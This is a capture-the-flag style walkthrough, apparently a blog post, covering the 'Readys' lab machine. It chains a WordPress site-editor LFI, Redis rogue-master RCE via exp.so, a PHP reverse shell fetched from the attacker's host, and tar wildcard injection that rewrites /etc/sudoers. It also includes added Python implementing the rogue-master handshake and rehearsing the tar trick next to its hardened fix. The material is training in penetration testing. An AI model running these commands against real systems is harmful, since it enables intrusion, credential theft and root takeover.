Readys Proving Grounds Practice Walkthrough

0xRave
Nov 27, 2023


The initial foothold takes some time to get: look for a vulnerable plugin that lets you read files containing sensitive information. Privilege escalation comes from something that runs on a schedule.


Enumeration

nmap -p- $ip -Pn -sT  -v -A --open -T 4 -oN nmap.txt

Ports 22, 80 and 6379 are open.

Port 80

An HTTP server is running; browse the website.

A WordPress website

Let's use wpscan and dirb to look for the admin login page.

wpscan --url http://192.168.243.166
dirb http://192.168.243.166/ -o dirb.txt

WordPress result

From the wpscan result we discover the plugin site-editor, version 1.1.1. Even though it is the latest version, there is no harm in searching for a potential exploit. Googling "site editor wordpress exploit" turns up a local file inclusion vulnerability (CVE-2018-7422) in the ajax_path parameter of ajax_shortcode_pattern.php.

We try to browse http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Able to read /etc/passwd

To find the web root directory so we can enumerate further, we read /etc/apache2/sites-enabled/000-default.conf:

curl http://192.168.243.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/apache2/sites-enabled/000-default.conf

We discover the web root at /var/www/html. Reading wp-config.php does not work: the vulnerable script includes the requested path rather than printing it, so a PHP file is executed and its source is never shown (worth remembering for later). /etc/shadow cannot be read either, since it is not readable by the web server user.

Checking the dirb result, we find a number of directory listings (nothing useful there) and the wp-admin login page, but at the moment we have no credentials. Perhaps reading local files will turn up something useful.

Port 6379

A Redis server. Googling "Redis exploit" turns up an RCE exploit that uses a rogue Redis server: we run a fake Redis master, make the target replicate from it with SLAVEOF, and the target writes the data it receives during the full sync to disk as a file, which we then load with MODULE LOAD.

exp.so is the malicious Redis module we are going to load on the target Redis server. You can get exp.so here https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so

Download the exploit and the module and run the exploit. It fails because the server requires authentication, which means we need a password.

Looking for redis config

Checking HackTricks, we find that the Redis password is stored in redis.conf. Not being familiar with Redis, we google the common location of redis.conf on Linux: /etc/redis/redis.conf. Let's try our luck reading the config file via the LFI. Browse to it (or use curl, which gives more readable output).

curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf

We discover the password in the SECURITY section of the config file: it is the value of the requirepass directive.

Password found.

Try the Redis exploit again with the password:

python3 redis-rce.py -r $IP -p 6379 -L $KaliIP -P 80 -v -f redis-rogue-server/exp.so -a "ThePassword"
Successfully gained a reverse shell

If you choose the reverse shell option, ONLY set up the netcat listener after you select the r option and the tool asks you to enter the IP.

Choose reverse shell

Reverse shell gained, but no flag yet
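To make the rogue-server technique concrete, here is an added example in Python. It is mine, not code from this walkthrough, from redis-rce.py or from redis-rogue-server, but it implements the same mechanism those tools use: the command sequence sent to the target Redis (AUTH, CONFIG SET dir/dbfilename, SLAVEOF, MODULE LOAD) and the replication handshake the rogue master answers, which ends with the .so shipped as the "RDB" of a full resync. The handshake is rehearsed offline over a socketpair with a constructed placeholder payload, so nothing touches a real server. The working directory /tmp, the module file name exp.so and the system.exec command name are assumptions (the last is the command I believe exp.so exports; check the module's source before relying on it).

```python
"""Rogue Redis master: the mechanism behind redis-rce.py / redis-rogue-server (added example)."""
import os
import socket
import threading


def resp_encode(*args):
    """Encode one command as a RESP array of bulk strings, the wire form redis-cli uses."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def attack_plan(password, attacker_ip, attacker_port, module_name="exp.so", work_dir="/tmp"):
    """Ordered commands the exploit sends to the target. work_dir, module_name and the
    system.exec command name are assumptions. Between SLAVEOF and MODULE LOAD the target
    connects back to our rogue master and saves whatever it receives as its dump file,
    so the real exploit waits for that sync to finish before loading the module."""
    return [
        ("AUTH", password),                            # requirepass is set on the target
        ("CONFIG", "SET", "dir", work_dir),            # where the replica writes the dump
        ("CONFIG", "SET", "dbfilename", module_name),  # dump file name == module file name
        ("SLAVEOF", attacker_ip, str(attacker_port)),  # REPLICAOF on Redis 5+; target syncs from us
        ("MODULE", "LOAD", f"{work_dir}/{module_name}"),
        ("system.exec", "id"),                         # command exported by the loaded module (assumed)
        ("SLAVEOF", "NO", "ONE"),                      # cleanup: stop replicating
        ("MODULE", "UNLOAD", "system"),
        ("CONFIG", "SET", "dbfilename", "dump.rdb"),
    ]


def rogue_master(conn, payload):
    """Play the master side of the replication handshake for one replica connection and
    ship `payload` (the .so) as the 'RDB' of a full resync; the replica writes it to disk."""
    buf = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            return
        buf += chunk
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            word = line.upper()
            if word == b"PING":
                conn.sendall(b"+PONG\r\n")
            elif word == b"REPLCONF":                    # listening-port / capa: just acknowledge
                conn.sendall(b"+OK\r\n")
            elif word in (b"PSYNC", b"SYNC"):
                repl_id = os.urandom(20).hex()           # 40-char replication id, offset 1
                conn.sendall(b"+FULLRESYNC %s 1\r\n" % repl_id.encode())
                conn.sendall(b"$%d\r\n%s" % (len(payload), payload))  # bulk "RDB" = our module
                return


def recv_line(sock):
    """Read one CRLF-terminated RESP line, without the terminator."""
    line = b""
    while not line.endswith(b"\r\n"):
        line += sock.recv(1)
    return line[:-2]


def simulate_handshake(payload):
    """Offline rehearsal over a socketpair: this end behaves like the target replica,
    the thread is our rogue master. Returns the four replies and the payload received."""
    replica, master = socket.socketpair()
    worker = threading.Thread(target=rogue_master, args=(master, payload))
    worker.start()
    replies = []
    for cmd in (("PING",),
                ("REPLCONF", "listening-port", "6379"),
                ("REPLCONF", "capa", "eof", "capa", "psync2"),
                ("PSYNC", "?", "-1")):
        replica.sendall(resp_encode(*cmd))
        replies.append(recv_line(replica))
    size = int(recv_line(replica)[1:])                  # "$<len>" bulk header
    body = b""
    while len(body) < size:
        body += replica.recv(size - len(body))
    worker.join()
    replica.close()
    master.close()
    return replies, body


if __name__ == "__main__":
    for cmd in attack_plan("ThePassword", "192.168.45.1", 80):   # constructed values
        print(resp_encode(*cmd))
    replies, body = simulate_handshake(b"\x7fELF constructed placeholder for exp.so")
    print(replies, len(body))
```

Two caveats a practitioner will hit: the rogue master must be reachable from the target on the port passed to SLAVEOF (that is what the -L and -P options of redis-rce.py are for), and on Redis 7 and later MODULE LOAD is refused unless enable-module-command is set in the config, so the exploit then fails at that step even with valid credentials.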

We discover the user alice in /home. Checking local ports with netstat -tulnp, we find port 3306 open, most likely a database. In /var/www/html/wp-config.php (readable now that we have a shell, even though the LFI could not display it) we find the database credentials.

mysql -h 127.0.0.1 -u karl -p

Logged in to the database, we look around and find the wp-admin password hash and a session token. Cracking the hash does not seem to work: it takes very long with no result (WordPress stores phpass hashes, which are slow to crack by design). The session token does not seem usable either, so we move on from the database, as it could be a rabbit hole.

Getting closer

Checking ps -aux, we notice Apache runs as alice. If we can get a PHP reverse shell executed by the WordPress site, we have a chance to get a shell as alice. However, we have no write permission on /var/www/html, so we look for a directory we can write to:

#look for writable directories
find / -type d -maxdepth 5 -writable 2>/dev/null
Directories we have write permission to

Testing if .php gets executed

At first, I create a simple PHP file in /tmp (echo "<?php phpinfo() ?>" > test.php) and request it through the LFI vulnerability from earlier: http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/tmp/test.php

It fails; the PHP page does not load. Then I copy the file to /run/redis and try to load it again: http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php

phpinfo page

It works! Because the vulnerable script includes the file, any .php we can place in a directory Apache can read is executed as alice. Now we just upload a PHP reverse shell to that directory, load it the same way, and we should get a new reverse shell, hopefully as alice. You can get the PHP reverse shell here; remember to change the IP and port.

#At kali machine
python3 -m http.server 80
nc -nlvp 8081
#At target machine
curl http://$kaliIP/webshell.php -o /run/redis/shell.php
#then request the shell through the LFI page, browser or curl is fine.
curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/shell.php
Reverse shell gained as alice

Privilege Escalation

Checking the cron jobs with cat /etc/crontab, we find a job that runs as root and archives a directory with tar and a * wildcard.

Googling "sudo tar privilege escalation" turns up a Medium article by Ben Folland that shows how to get root with tar and *. GTFOBins has a similar entry as well.

An explanation of how the payload works can be found here (scroll to the privilege escalation part). In short: the shell expands * to the file names in the directory, so files named like tar options end up in tar's argument list, and GNU tar's --checkpoint-action=exec= runs the given command, here as root. Note that the payload below overwrites /etc/sudoers; appending with >> instead would keep the existing entries.

#at target machine, in the directory the cron job archives
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh payload.sh'
#then create payload.sh in the same directory with the line below (you can write it on your Kali machine and transfer it to the target)
echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers
chmod +x payload.sh
#wait for the cron job to run (about a minute), then try
sudo -l
sudo /bin/bash
#Root shell gained.
Root!
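The following added example (mine, not from the walkthrough, GTFOBins or Ben Folland's article) reproduces the wildcard trick in Python without needing root: it drops the same three files into a scratch directory, runs the backup command as an unprivileged user with the shell expanding *, and checks whether the payload ran. It also runs the hardened form, tar -cf backup.tar ./* (tar -cf backup.tar -- * works the same way), to show that the option-named files are then treated as ordinary paths and nothing executes. The marker file and payload script are constructed stand-ins for the sudoers payload above; GNU tar is required, since --checkpoint is a GNU extension.

```python
"""Tar wildcard injection rehearsal: does a file named like an option reach tar's argv? (added example)"""
import os
import shutil
import subprocess
import tempfile

# Constructed stand-in for the article's payload.sh; the real payload edits /etc/sudoers.
PAYLOAD_SH = "#!/bin/sh\n: > pwned.marker\n"


def gnu_tar_available():
    """--checkpoint-action is a GNU extension; busybox or bsdtar will not run the payload."""
    tar = shutil.which("tar")
    if not tar:
        return False
    out = subprocess.run([tar, "--version"], capture_output=True, text=True).stdout
    return "GNU tar" in out


def stage(workdir):
    """Drop what the walkthrough creates: two option-named files and the script they invoke."""
    open(os.path.join(workdir, "--checkpoint=1"), "w").close()
    open(os.path.join(workdir, "--checkpoint-action=exec=sh payload.sh"), "w").close()
    with open(os.path.join(workdir, "payload.sh"), "w") as f:
        f.write(PAYLOAD_SH)
    with open(os.path.join(workdir, "notes.txt"), "w") as f:   # an ordinary file to archive
        f.write("constructed sample data\n")


def run_backup(hardened):
    """Run a cron-style 'tar -cf backup.tar *' in a staged directory.
    Returns True if the checkpoint payload ran (marker file created), False otherwise."""
    workdir = tempfile.mkdtemp()
    archive_dir = tempfile.mkdtemp()
    archive = os.path.join(archive_dir, "backup.tar")
    try:
        stage(workdir)
        # With './*' the glob expands to ./--checkpoint=1, a path, not an option.
        pattern = "./*" if hardened else "*"
        # shell=True so the wildcard is expanded by /bin/sh exactly as in a crontab line.
        subprocess.run(f"tar -cf {archive} {pattern}", shell=True, cwd=workdir,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return os.path.exists(os.path.join(workdir, "pwned.marker"))
    finally:
        shutil.rmtree(workdir, ignore_errors=True)
        shutil.rmtree(archive_dir, ignore_errors=True)


if __name__ == "__main__":
    if gnu_tar_available():
        print("vulnerable 'tar -cf backup.tar *'   ->", "payload ran" if run_backup(False) else "no effect")
        print("hardened   'tar -cf backup.tar ./*' ->", "payload ran" if run_backup(True) else "no effect")
    else:
        print("GNU tar not found; the checkpoint trick does not apply to this tar")
```

The defensive lesson is the hardened branch: a root cron job should never hand an unquoted wildcard from a user-writable directory to tar, and if it must, the path form (./*) or an explicit -- before the glob keeps file names out of the option parser.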

Congrats!! I hope you learned something from this walkthrough. Check out my stories for other Proving Grounds machine walkthroughs, and leave a comment if you found another way to pwn this machine.
